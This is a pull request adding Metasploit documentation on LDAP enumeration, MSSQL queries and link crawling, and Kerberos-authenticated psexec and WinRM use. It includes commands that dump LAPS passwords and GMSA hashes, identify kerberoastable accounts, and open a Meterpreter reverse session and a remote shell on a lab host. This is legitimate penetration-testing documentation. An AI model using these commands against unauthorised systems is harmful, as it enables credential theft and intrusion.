### PR TITLE
Add additional documentation for mssql and ldap

### DIFF
--- a/docs/_config_staging.yml
+++ b/docs/_config_staging.yml
@@ -1,3 +1,3 @@
-# Staging assumes that ot is currently deployed to gh-pages; All links are prefixed with /metasploit-framework
+# Staging assumes that it is currently deployed to gh-pages; All links are prefixed with /metasploit-framework
 baseurl: 'metasploit-framework'
 ga_tracking: ''

--- a/docs/build.rb
+++ b/docs/build.rb
@@ -255,8 +255,20 @@ module Build
       if matched_pages.empty?
         raise "Link not found: #{old_path}"
       end
+      # Additional filter for absolute paths if there's potential ambiguity
       if matched_pages.count > 1
-        raise "Duplicate paths for #{old_path}"
+        refined_pages = matched_pages.select do |page|
+          !page[:folder] &&
+            (page[:path].downcase == "#{old_path}.md".downcase ||
+              page[:path].downcase == old_path.downcase)
+        end
+
+        if refined_pages.count != 1
+          page_paths = matched_pages.map { |page| page[:path] }
+          raise "Duplicate paths for #{old_path} - possible page paths found: #{page_paths}"
+        end
+
+        matched_pages = refined_pages
       end
 
       matched_pages.first.fetch(:new_path)

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-LDAP.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-LDAP.md
@@ -1,7 +1,7 @@
 ## LDAP Workflows
 
 Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service.
-
+For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc. 
 
 LDAP on Windows environments are found on:
 
@@ -12,8 +12,114 @@ LDAP on Windows environments are found on:
 
 ### Lab Environment
 
-TODO
+LDAP support is enabled by default on a Windows environment when you install Active Directory.
+For LDAPS support to be enabled on port 636, you will have to configure [[AD CS (Active Directory Certificate Services)|ad-certificates/overview.md]]
+
+### Authentication
+
+The LDAP module supports the following forms of authentication with the `LDAPAuth` option:
+
+- auto
+- ntlm
+- kerberos - Example below
+- plaintext
+- none
 
 ### LDAP Enumeration
 
-TODO
+The `auxiliary/gather/ldap_query.rb` module can be used for querying LDAP:
+
+```
+use auxiliary/gather/ldap_query
+run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+```
+
+Example output:
+
+```
+msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+[*] Running module against 192.168.123.13
+
+[*] Discovering base DN automatically
+[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
+CN=Administrator CN=Users DC=domain DC=local
+==========================================
+
+ Name                Attributes
+ ----                ----------
+ badpwdcount         0
+ description         Built-in account for administering the computer/domain
+ lastlogoff          1601-01-01 00:00:00 UTC
+ lastlogon           2023-01-23 11:02:49 UTC
+ logoncount          159
+ memberof            CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local |
+                     | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
+                     inistrators,CN=Builtin,DC=domain,DC=local
+ name                Administrator
+ pwdlastset          133189448681297271
+ samaccountname      Administrator
+ useraccountcontrol  512
+
+ ... etc ...
+```
+
+This module has a selection of inbuilt queries which can be configured via the `action` setting to make enumeration easier:
+
+- `ENUM_ACCOUNTS` - Dump info about all known user accounts in the domain.
+- `ENUM_ADCS_CAS` - Enumerate ADCS certificate authorities.
+- `ENUM_ADCS_CERT_TEMPLATES` - Enumerate ADCS certificate templates.
+- `ENUM_ADMIN_OBJECTS` - Dump info about all objects with protected ACLs (i.e highly privileged objects).
+- `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
+- `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
+- `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
+- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
+- `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
+- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
+- `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
+- `ENUM_EXCHANGE_SERVERS` - Dump info about all known Exchange servers.
+- `ENUM_GMSA_HASHES` - Dump info about GMSAs and their password hashes if available.
+- `ENUM_GROUPS` - Dump info about all known groups in the LDAP environment.
+- `ENUM_GROUP_POLICY_OBJECTS` - Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.
+- `ENUM_HOSTNAMES` - Dump info about all known hostnames in the LDAP environment.
+- `ENUM_LAPS_PASSWORDS` - Dump info about computers that have LAPS enabled, and passwords for them if available.
+- `ENUM_LDAP_SERVER_METADATA` - Dump metadata about the setup of the domain.
+- `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
+- `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
+- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
+- `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
+- `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
+- `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
+- `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
+- `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
+- `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Query LDAP for accounts:
+
+```
+msf6 > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldapauth=kerberos ldaprhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
+[*] Running module against 192.168.123.13
+
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
+[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] Discovering base DN automatically
+[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
+CN=Administrator CN=Users DC=domain DC=local
+==========================================
+
+ Name                Attributes
+ ----                ----------
+ badpwdcount         0
+ pwdlastset          133184302034979121
+ samaccountname      Administrator
+ useraccountcontrol  512
+ ... etc ...
+```

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-MSSQL.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-MSSQL.md
@@ -19,3 +19,43 @@ Environment setup:
 
 ### MSSQL Enumeration
 
+### Running queries
+
+```
+use auxiliary/admin/mssql/mssql_sql
+run rhost=192.168.123.13 username=administrator password=p4$$w0rd sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+```
+
+### Link crawling
+
+Identify if the SQL server has been configured with trusted links, which allows running queries on other MSSQL instances:
+
+```
+use windows/mssql/mssql_linkcrawler
+run rhost=192.168.123.13 username=administrator password=p4$$w0rd
+```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Connect to a Microsoft SQL Server instance and run a query:
+
+```
+msf6 > use auxiliary/admin/mssql/mssql_sql
+msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssqlauth=kerberos mssqlrhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+[*] Reloading module...
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
+[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
+[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
+[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)
+
+ auth_scheme
+ -----------
+ KERBEROS
+
+[*] Auxiliary module execution completed
+```

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-SMB.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-SMB.md
@@ -185,3 +185,30 @@ use auxiliary/admin/smb/upload_file
 echo "my file" > local_file.txt
 run smb://a:p4$$w0rd@192.168.123.13/my_share/remote_file.txt lpath=./local_file.txt
 ```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Running psexec against a host:
+
+```
+msf6 > use exploit/windows/smb/psexec
+msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smbauth=kerberos domaincontrollerrhost=192.168.123.13 smbrhostname=dc3.demo.local domain=demo.local
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.13:445 - Connecting to the server...
+[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] 192.168.123.13:445 - Selecting PowerShell target
+[*] 192.168.123.13:445 - Executing the payload...
+[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.123.13
+[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
+
+meterpreter >
+```

--- a/docs/metasploit-framework.wiki/Metasploit-Guide-WinRM.md
+++ b/docs/metasploit-framework.wiki/Metasploit-Guide-WinRM.md
@@ -7,6 +7,11 @@ There are two main ports for WinRM:
 - 5985/TCP - HTTP
 - 5986/TCP - HTTPS
 
+On older versions of Windows such as Windows 7/Windows Server 2008 the following ports were used:
+
+- 80/TCP - HTTP
+- 443/TCP - HTTPS
+
 Important: Before running the chosen WinRM Metasploit module, first ensure that the `RPORT` and `SSL` values are configured correctly.
 Either with the modern inline option support:
 
@@ -132,4 +137,33 @@ Microsoft Windows [Version 10.0.14393]
 (c) 2016 Microsoft Corporation. All rights reserved.
 
 C:\Users\user>
+```
+
+### Kerberos Authentication
+
+Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
+
+Open a WinRM session:
+
+```
+msf6 > use auxiliary/scanner/winrm/winrm_login
+msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.demo.local domain=demo.local
+
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:5985   - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
+[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
+[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
+[+] 192.168.123.13:5985 - Login Successful: demo.local\Administrator:p4$$w0rd
+[*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+[*] Starting interaction with 1...
+
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+C:\Users\Administrator>
 ```

--- a/docs/metasploit-framework.wiki/kerberos/service_authentication.md
+++ b/docs/metasploit-framework.wiki/kerberos/service_authentication.md
@@ -93,7 +93,7 @@ Connect to a Microsoft SQL Server instance and run a query:
 
 ```
 msf6 > use auxiliary/admin/mssql/mssql_sql
-msf6 auxiliary(admin/mssql/mssql_sql) > rerun 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssqlauth=kerberos mssqlrhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssqlauth=kerberos mssqlrhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...
 [*] Running module against 192.168.123.13
 


### PR DESCRIPTION
Continuation of https://github.com/rapid7/metasploit-framework/pull/17484

Adding additional documentation for mssql and ldap modules

## Verification

- The docs are readable
- CI passes